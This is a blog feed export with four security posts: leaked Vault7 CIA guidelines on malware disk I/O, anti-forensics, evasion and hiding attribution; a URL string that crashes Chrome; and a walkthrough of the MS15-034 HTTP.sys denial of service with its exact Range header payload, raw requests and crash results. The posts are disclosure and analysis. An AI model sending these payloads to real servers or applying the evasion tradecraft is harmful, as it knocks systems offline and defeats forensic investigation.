Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com2tag:blogger.com,1999:blog-1852980805947568568.post-61963194097517091612017-04-08T02:43:00.002+05:302017-04-08T02:43:55.279+05:30Vault7: Malware and Disk I/O (Input Output)aa<br />
Following were the guidelines given to Malware authors at CIA, how to deal with Disk I/O and steps taken to save data on to disk or deleting saved date from disk.<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; box-sizing: inherit; color: #555555; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 1em; max-width: 100%;"><tbody style="box-sizing: inherit;">
<tr style="box-sizing: inherit;"><th style="background-color: #cccccc; box-sizing: inherit; padding: 0.2em 0.5em; text-align: left;">Directive</th><th style="background-color: #cccccc; box-sizing: inherit; padding: 0.2em 0.5em; text-align: left;">Rationale</th></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO explicitly document the "disk forensic footprint" that could be potentially created by various features of a binary/tool on a remote target.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Enables better operational risk assessments with knowledge of potential file system forensic artefacts.</td></tr>
<tr style="box-sizing: inherit;"><td style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT read, write and/or cache data to disk unnecessarily. Be cognizant of 3rd party code that may implicitly write/cache data to disk.</td><td style="box-sizing: inherit; padding: 0.2em 0.5em;">Lowers potential for forensic artefacts and potential signatures.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT write plain-text collection data to disk.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises difficulty of incident response and forensic analysis.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO encrypt all data written to disk.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Disguises intent of file (collection, sensitive code, etc) and raises difficulty of forensic analysis and incident response.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO utilize a secure erase when removing a file from disk that wipes at a minimum the file's filename, datetime stamps (create, modify and access) and its content.</div>
<div style="box-sizing: inherit; margin-bottom: 0.72em;">
(Note: The definition of "secure erase" varies from filesystem to filesystem, but at least a single pass of zeros of the data should be performed. The emphasis here is on removing all filesystem artefacts that could be useful during forensic analysis)</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises difficulty of incident response and forensic analysis.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO NOT perform Disk I/O operations that will cause the system to become unresponsive to the user or alerting to a System Administrator.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids unwanted attention from the user or system administrator to tool's existence and behavior.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT use a "magic header/footer" for encrypted files written to disk. All encrypted files should be completely opaque data files.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids signature of custom file format's magic values.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT use hard-coded filenames or filepaths when writing files to disk. This must be configurable at deployment time by the operator.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Allows operator to choose the proper filename that fits with in the operational target.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO have a configurable maximum size limit and/or output file count for writing encrypted output files.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
Avoids situations where a collection task can get out of control and fills the target's disk; which will draw unwanted attention to the tool and/or the operation.</div>
</td></tr>
</tbody></table>
<br />
<br />Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com4tag:blogger.com,1999:blog-1852980805947568568.post-53377223733673516492017-04-08T02:34:00.002+05:302017-04-08T02:34:41.544+05:30Vault7: Malware evasion and Reverse Engineering difficulty Comparison<blockquote class="tr_bq">
<br /></blockquote>
This is basically Do's and Don'ts for a Malware author. Below table explains how a malware author can bypass different AntiVirus engines, by reversing the logic we can use similar concepts to detect the malware. Below pointers apply to PE files, Mach-O, ELF and other binaries.<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; box-sizing: inherit; color: #555555; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 1em; max-width: 100%;"><tbody style="box-sizing: inherit;">
<tr style="box-sizing: inherit;"><th style="background-color: #cccccc; box-sizing: inherit; padding: 0.2em 0.5em; text-align: left;">Evasion</th><th style="background-color: #cccccc; box-sizing: inherit; padding: 0.2em 0.5em; text-align: left;">Rationale/Detection</th></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO obfuscate or encrypt all strings and configuration data that directly relate to tool functionality. Consideration should be made to also only de-obfuscating strings in-memory at the moment the data is needed. When a previously de-obfuscated value is no longer needed, it should be wiped from memory.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">String data and/or configuration data is very useful to analysts and reverse-engineers.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT decrypt or de-obfuscate all string data or configuration data immediately upon execution.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for automated dynamic analysis of the binary to find sensitive data.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO explicitly remove sensitive data (encryption keys, raw collection data, shellcode, uploaded modules, etc) from memory as soon as the data is no longer needed in plain-text form.</div>
<div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO NOT RELY ON THE OPERATING SYSTEM TO DO THIS UPON TERMINATION OF EXECUTION.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for incident response and forensics review.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO utilize a deployment-time unique key for obfuscation/de-obfuscation of sensitive strings and configuration data.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty of analysis of multiple deployments of the same tool.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO strip all debug symbol information, manifests(MSVC artefact), build paths, developer usernames from the final build of a binary.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for analysis and reverse-engineering, and removes artefacts used for attribution/origination.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO strip all debugging output (e.g. calls to printf(), OutputDebugString(), etc) from the final build of a tool.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for analysis and reverse-engineering.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT explicitly import/call functions that is not consistent with a tool's overt functionality (i.e. WriteProcessMemory, VirtualAlloc, CreateRemoteThread, etc - for binary that is supposed to be a notepad replacement).</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Lowers potential scrutiny of binary and slightly raises the difficulty for static analysis and reverse-engineering.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT export sensitive function names; if having exports are required for the binary, utilize an ordinal or a benign function name.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for analysis and reverse-engineering.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO NOT generate crash dump files, core dump files, "Blue" screens, Dr Watson or other dialog pop-ups and/or other artefacts in the event of a program crash.</div>
<div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO attempt to force a program crash during unit testing in order to properly verify this.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids suspicion by the end user and system admins, and raises the difficulty for incident response and reverse-engineering.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT perform operations that will cause the target computer to be unresponsive to the user (e.g. CPU spikes, screen flashes, screen "freezing", etc).</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids unwanted attention from the user or system administrator to tool's existence and behaviour.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td style="box-sizing: inherit; padding: 0.2em 0.5em;">DO make all reasonable efforts to minimize binary file size for all binaries that will be uploaded to a remote target (<u style="box-sizing: inherit;">without</u> the use of packers or compression). Ideal binary file sizes should be under 150KB for a fully featured tool.</td><td style="box-sizing: inherit; padding: 0.2em 0.5em;">Shortens overall "time on air" not only to get the tool on target, but to time to execute functionality and clean-up.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO provide a means to completely "uninstall"/"remove" implants, function hooks, injected threads, dropped files, registry keys, services, forked processes, etc whenever possible. Explicitly document (even if the documentation is "There is no uninstall for this <feature>") the procedures, permissions required and side effects of removal.</feature></td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids unwanted data left on target. Also, proper documentation allows operators to make better operational risk assessment and fully understand the implications of using a tool or specific feature of a tool.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT leave dates/times such as compile timestamps, linker timestamps, build times, access times, etc. that correlate to general US core working hours (i.e. 8am-6pm Eastern time)</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids direct correlation to origination in the United States.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO NOT leave data in a binary file that demonstrates CIA, USG, or its witting partner companies involvement in the creation or use of the binary/tool.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Attribution of binary/tool/etc by an adversary can cause irreversible impacts to past, present and future <span class="glossary" style="border-bottom: 1px dotted black; box-sizing: inherit; cursor: help; display: inline-block; position: relative;">USG<span class="glossary-tt" style="background-color: black; border-radius: 6px; box-sizing: inherit; color: white; font-size: 14px; left: 17.0312px; margin-left: -60px; padding: 5px 0px; position: absolute; text-align: center; top: 30px; visibility: hidden; width: 120px; z-index: 1;"></span></span> operations and equities.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT have data that contains CIA and <span class="glossary" style="border-bottom: 1px dotted black; box-sizing: inherit; cursor: help; display: inline-block; position: relative;">USG<span class="glossary-tt" style="background-color: black; border-radius: 6px; box-sizing: inherit; color: white; font-size: 14px; left: 17.0312px; margin-left: -60px; padding: 5px 0px; position: absolute; text-align: center; top: 30px; visibility: hidden; width: 120px; z-index: 1;"></span></span> cover terms, compartments, operation code names or other CIA and <span class="glossary" style="border-bottom: 1px dotted black; box-sizing: inherit; cursor: help; display: inline-block; position: relative;">USG<span class="glossary-tt" style="background-color: black; border-radius: 6px; box-sizing: inherit; color: white; font-size: 14px; left: 17.0312px; margin-left: -60px; padding: 5px 0px; position: absolute; text-align: center; top: 30px; visibility: hidden; width: 120px; z-index: 1;"></span></span> specific terminology in the binary.</td><td style="box-sizing: inherit; padding: 0.2em 0.5em;">Attribution of binary/tool/etc by an adversary can cause irreversible impacts to past, present and future <span class="glossary" style="border-bottom: 1px dotted black; box-sizing: inherit; cursor: help; display: inline-block; position: relative;">USG<span class="glossary-tt" style="background-color: black; border-radius: 6px; box-sizing: inherit; color: white; font-size: 14px; left: 17.0312px; margin-left: -60px; padding: 5px 0px; position: absolute; text-align: center; top: 30px; visibility: hidden; width: 120px; z-index: 1;"></span></span> operations and equities.</td></tr>
<tr style="box-sizing: inherit;"><td style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT have "dirty words" in the binary.</td><td style="box-sizing: inherit; padding: 0.2em 0.5em;">Dirty words, such as hacker terms, may cause unwarranted scrutiny of the binary file in question.</td></tr>
</tbody></table>
CIA - Central Intelligence Agency<br />
USG - United States GovernmentPraveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com1tag:blogger.com,1999:blog-1852980805947568568.post-38887659298226660822015-09-23T12:31:00.000+05:302015-09-23T12:31:24.359+05:30ChromeCrash: It is not 16 characters but 14!16 characters can crash latest Chrome browser, there are many articles related to this DoS Vulnerability. Most of the articles state minimum required characters to crash is 16 but my tests show that 14 characters can trigger crash.<br />
Those articles point to below URL<br />
<span style="color: #cc0000;">http://a/%%30%30</span><br />
<br />
Tested with<br />
<span style="color: #cc0000;">ws://a/%%30%30</span><br />
ws URI handler stands for WebSockets<br />
<br />
One of the first bugs in Chrome uses one character (%) to crash, found by one of my friends Rishi Narang.<br />
<br />
Tested on<br />
<table border="0" cellpadding="0" cellspacing="0" id="inner" style="background-color: white; color: black; font-family: 'Segoe UI', Tahoma, sans-serif; font-size: 16px; padding-top: 10px; word-break: break-word;"><tbody>
<tr><td class="label" i18n-content="application_label" style="-webkit-padding-end: 5px; font-size: 0.9em; font-weight: bold; vertical-align: top; white-space: nowrap;">Google Chrome</td><td class="version" id="version" style="font-family: monospace; max-width: 430px; padding-left: 5px; vertical-align: bottom;"><span i18n-content="version">45.0.2454.99</span> (<span i18n-content="official">Official Build</span>) <span i18n-content="version_modifier">m</span> <span i18n-content="version_bitsize">(32-bit)</span></td></tr>
<tr><td class="label" i18n-content="revision" style="-webkit-padding-end: 5px; font-size: 0.9em; font-weight: bold; vertical-align: top; white-space: nowrap;">Revision</td><td class="version" style="font-family: monospace; max-width: 430px; padding-left: 5px; vertical-align: bottom;"><span i18n-content="cl">8813113675a50e4f7e90fec49a3eb1796454618b-refs/branch-heads/2454@{#492}</span></td></tr>
<tr><td class="label" i18n-content="os_name" style="-webkit-padding-end: 5px; font-size: 0.9em; font-weight: bold; vertical-align: top; white-space: nowrap;">OS</td><td class="version" id="os_type" style="font-family: monospace; max-width: 430px; padding-left: 5px; vertical-align: bottom;"><span i18n-content="os_type">Windows</span><br /></td></tr>
</tbody></table>
List of IANA recognized URI Handlers can be found at<br />
<a href="http://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml">http://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml</a>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-13056343651083266842015-04-17T23:28:00.001+05:302015-04-17T23:45:30.741+05:30HTTP.sys Denial of Service (MS15-034/CVE-2015-1635)The vulnerability is due to crafted HTTP request by passing large value in Range header, IIS fails to validate the value properly leading to Denial of Service (Unresponsive or Blue Screen of Death) and possible Code Execution.<br />
<br />
To trigger the vulnerability request a resource which must be present on the IIS web server, say default files (welcome.png, iisstart.htm etc.)<br />
<br />
Original PoC was posted on Pastebin<br />
<a href="http://pastebin.com/raw.php?i=ypURDPc4">http://pastebin.com/raw.php?i=ypURDPc4</a><br />
<br />
You can verify if Kernel-mode Caching is enabled (which is enabled by default) or not.<br />
If IIS Manager is installed follow below steps.<br />
IIS Manager -> Default Web Site -> Output Caching ->double click -> Edit Feature Settings (on top right)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOcrXzi2PRhrW2Ti9ZWNVMZJtUjIBjxskMu3w-N-2XjDD_w1STmuwNiGJitN66Ue5vXVQ20A3_dZoC6AxI9ugW4NZ80_oElpVHACXSOtVut1da7mmzd07lIwlQ5op0XYNJfaJvHDfVwUBj/s1600/HTTP_sys_OutputCaching.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOcrXzi2PRhrW2Ti9ZWNVMZJtUjIBjxskMu3w-N-2XjDD_w1STmuwNiGJitN66Ue5vXVQ20A3_dZoC6AxI9ugW4NZ80_oElpVHACXSOtVut1da7mmzd07lIwlQ5op0XYNJfaJvHDfVwUBj/s1600/HTTP_sys_OutputCaching.png" height="236" width="400" /></a></div>
<br />
To add Cache Rule, click on Add link on top right (no required though)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhY_1FmGtbzVEIarvWV69fB5dAjtkXN2Plt_EG9pL6u3MK09Uuk8ET70mxR0mTXthoOCnQLMY6DDqEdvq2oHuOM17m-jow6j8phVTRIQ-vbXQX26b8Qv9qS8bCQy7CWpCWAYVCAIY87ERT/s1600/HTTP_sys_Addhtmextension_KernelCaching.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhY_1FmGtbzVEIarvWV69fB5dAjtkXN2Plt_EG9pL6u3MK09Uuk8ET70mxR0mTXthoOCnQLMY6DDqEdvq2oHuOM17m-jow6j8phVTRIQ-vbXQX26b8Qv9qS8bCQy7CWpCWAYVCAIY87ERT/s1600/HTTP_sys_Addhtmextension_KernelCaching.png" height="236" width="400" /></a></div>
<br />
<br />
We can verify http parameters using command line(CLI).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK1wj7yXhtV2U6zyxSkG1K5Gp9h90Xbg7uV9v9-Ztz7_oFyi_jMMOJg6lS6RnW3rCjPZn-ioGsLLgUf734BQkX_aeXpUnxw0sgiExvDV3lg-qmlKSV1l_8gVMFqTs7OsyKdtvMRw_w8bb7/s1600/HTTP_sys_cli_check_config.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK1wj7yXhtV2U6zyxSkG1K5Gp9h90Xbg7uV9v9-Ztz7_oFyi_jMMOJg6lS6RnW3rCjPZn-ioGsLLgUf734BQkX_aeXpUnxw0sgiExvDV3lg-qmlKSV1l_8gVMFqTs7OsyKdtvMRw_w8bb7/s1600/HTTP_sys_cli_check_config.png" height="341" width="400" /></a></div>
<br />
<br />
I successfully tested and observed BSoD on Windows 7 SP1 IIS 7.5, default installation.<br />
Following range header didn't lead to crash in my case.<br />
<span style="font-family: Courier New, Courier, monospace;">Range: bytes=0-18446744073709551615</span><br />
but<br />
<span style="font-family: Courier New, Courier, monospace;">Range: bytes=18-18446744073709551615</span><br />
will definitely lead to DoS, single HTTP request didn't lead to DoS in my tests. We have to atleast make 2 or 3 HTTP requests.<br />
<br />
<b>Auditing/Assessing IIS using script available on pastebin</b><br />
Request<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GET / HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Host: 192.168.56.110</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Range: bytes=0-18446744073709551615</span><br />
<br />
Response<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>HTTP/1.1 416 Requested Range Not Satisfiable</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Content-Type: text/html</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Last-Modified: Tue, 02 Dec 2014 05:52:00 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Accept-Ranges: bytes</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ETag: "a0495b17f4dd01:0"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Server: Microsoft-IIS/7.5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">X-Powered-By: ASP.NET</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">X-UA-Compatible: IE=EmulateIE7</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Date: Fri, 17 Apr 2015 06:51:08 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Content-Length: 362</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Content-Range: bytes */689</span><br />
<b><span style="color: red;">[!!] Looks VULN</span></b><span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></span><br />
<br />
Error message "HTTP Error 416. The requested range is not satisfiable" indicates the IIS Web Server is Vulnerable.<br />
<br />
Even if we request with valid resource(welcome.png) and range 0-18446744073709551615 we get response shown above with 416 status code but doesn't see BSoD or unresponsiveness.<br />
<div>
<span style="font-family: Courier New, Courier, monospace;">GET /welcome.png HTTP/1.1</span></div>
<br />
<b>Blue Screen of Death</b><br />
We can see a connection reset, junk response or no response from IIS server(will lead to multiple duplicate requests) indicating unresponsiveness or BSoD. Lets look at Wireshark traces showing these scenarios.<br />
<span style="color: #351c75;">Connection Reset from IIS Server</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaV6OFgZPlLzDc2ZyYcNeT3DNBJI4eiqUcADHFKisHxZi_CD6qTgYfvgLl8yjuc_K__miICaLSOaQrXPcsgzYlscv31__DtB71TLxzYRZZkuTDPlykYrmJbcQjN_KejP9FvqpwQqVl73M/s1600/HTTP_sys_RST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaV6OFgZPlLzDc2ZyYcNeT3DNBJI4eiqUcADHFKisHxZi_CD6qTgYfvgLl8yjuc_K__miICaLSOaQrXPcsgzYlscv31__DtB71TLxzYRZZkuTDPlykYrmJbcQjN_KejP9FvqpwQqVl73M/s1600/HTTP_sys_RST.png" height="163" width="400" /></a></div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GET /welcome.png HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Host: 192.168.56.110</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Range: bytes=18-18446744073709551615</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Traceback (most recent call last):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> File "./ms15_034.py", line 27, in <module></module></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> goodResp = client_socket.recv(1024)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">socket.error: [Errno 104] Connection reset by peer</span><br />
<br />
<span style="color: #351c75;">Junk Response (partial content)</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS_vGYH74YFfulME__AjHi-7_dOHFgkVl4D83et3Y0CfQtQQNOFqJE3P2oLp0U0YZy54u8431MYhAwcqEyMumPmmBdUvykjFnbHiCfEouAvlTAkDq1hb9XNUp00E0nkIPFH_M2dOMzPUs6/s1600/HTTP_sys_BSoD_pcap_with_Resp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS_vGYH74YFfulME__AjHi-7_dOHFgkVl4D83et3Y0CfQtQQNOFqJE3P2oLp0U0YZy54u8431MYhAwcqEyMumPmmBdUvykjFnbHiCfEouAvlTAkDq1hb9XNUp00E0nkIPFH_M2dOMzPUs6/s1600/HTTP_sys_BSoD_pcap_with_Resp.png" height="235" width="400" /></a></div>
<br />
This type of response will definitely lead to BSoD.<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HTTP/1.1 206 Partial Content</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Content-Type: image/png</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Last-Modified: Tue, 02 Dec 2014 05:52:00 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Accept-Ranges: bytes</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ETag: "30df5f17f4dd01:0"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Server: Microsoft-IIS/7.5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">X-Powered-By: ASP.NET</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">X-UA-Compatible: IE=EmulateIE7</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ?$? ?3s? ? ???$?h$z? B?Content-Range: bytes 18-429</span><br />
<br />
<span style="color: #351c75;">No response from IIS Server (duplicate requests)</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNhm6vtemMQYKyZrxn228oYO06oRe3J4QCMlZp9A4_2OLmqR-HFs5yxdgLL1YsVD9gWOas4pw7M5R0FS63M10vdjDc5UuPqWNXuRft1PyjEYjFYPvl-h7dI1L8uFhi1fdXPBr3uBc_SLel/s1600/HTTP_sys_BSoD_pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNhm6vtemMQYKyZrxn228oYO06oRe3J4QCMlZp9A4_2OLmqR-HFs5yxdgLL1YsVD9gWOas4pw7M5R0FS63M10vdjDc5UuPqWNXuRft1PyjEYjFYPvl-h7dI1L8uFhi1fdXPBr3uBc_SLel/s1600/HTTP_sys_BSoD_pcap.png" height="171" width="400" /></a></div>
This scenario mostly leads to Unresponsiveness. PoC script might be stuck at request phase only<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GET /welcome.png HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Host: 192.168.56.110</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Range: bytes=18-18446744073709551615</span><br />
<br />
Successful attack will lead to BSoD, following are the error messages which I observed<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">IRQL_NOT_LESS_OR_EQUAL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PAGE_FAULT_IN_NONPAGED_AREA</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiWi0hgVDzSnFjQPiQQopnHJn6JFQP58LvLAxqjD9lMaf6sE7VCAOfGM653mAsPA0ZMmgmDa8le7WLj6VS9w_bJpseI_S4Vmg6kYNYr1PbglHpyUNhcUvmJN-mWJge1XLn5izRvN6s81NE/s1600/HTTP_sys_BSoD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiWi0hgVDzSnFjQPiQQopnHJn6JFQP58LvLAxqjD9lMaf6sE7VCAOfGM653mAsPA0ZMmgmDa8le7WLj6VS9w_bJpseI_S4Vmg6kYNYr1PbglHpyUNhcUvmJN-mWJge1XLn5izRvN6s81NE/s1600/HTTP_sys_BSoD.png" height="231" width="400" /></a></div>
<br />
We will see following error message once the Server comes up after recovering from BSoD.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOmNXoFGgCAhvwgzpEfUEAIlxo5bXY37qLiaKkeCnZfiL4woE6a7rpDA35kTewr79rWVOfVOyy2YvYoDWGmoUy6o_0GGqLyXDZy96hz-UiM7IjjXRsQH0nyAsExkVQ1TwCibA9N8AzZv44/s1600/HTTP_sys_afterRecovering_from_BSoD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOmNXoFGgCAhvwgzpEfUEAIlxo5bXY37qLiaKkeCnZfiL4woE6a7rpDA35kTewr79rWVOfVOyy2YvYoDWGmoUy6o_0GGqLyXDZy96hz-UiM7IjjXRsQH0nyAsExkVQ1TwCibA9N8AzZv44/s1600/HTTP_sys_afterRecovering_from_BSoD.png" height="245" width="400" /></a></div>
<br />
No authentication required to trigger BSoD, Patch Immediately!!!<br />
<br />
For more details<br />
<a href="https://github.com/rapid7/metasploit-framework/pull/5150">https://github.com/rapid7/metasploit-framework/pull/5150</a><br />
